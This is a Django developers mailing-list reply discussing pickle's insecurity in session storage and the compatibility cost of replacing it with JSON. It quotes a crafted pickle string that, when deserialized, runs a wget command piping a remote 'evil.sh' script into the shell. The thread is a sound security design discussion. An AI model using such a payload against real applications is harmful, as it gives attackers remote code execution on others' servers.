On Oct 2, 2:31 pm, Paul McMillan <p...@mcmillan.ws> wrote: > data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'" > import pickle; pickle.loads(data) >
Some workarounds for Pickle's execution of arbitrary code are proposed here http://nadiana.com/python-pickle-insecure Also note one of the comments on that post points out that JSON converts all strings to unicode, and therefore cannot accurately restore byte-strings. I'd have to check through some of my own apps, but I suspect there may be users who are storing complex Python objects in sessions, whose code would break if Pickle was dropped. -- You received this message because you are subscribed to the Google Groups "Django developers" group. To post to this group, send email to django-developers@googlegroups.com. To unsubscribe from this group, send email to django-developers+unsubscr...@googlegroups.com. For more options, visit this group at http://groups.google.com/group/django-developers?hl=en.
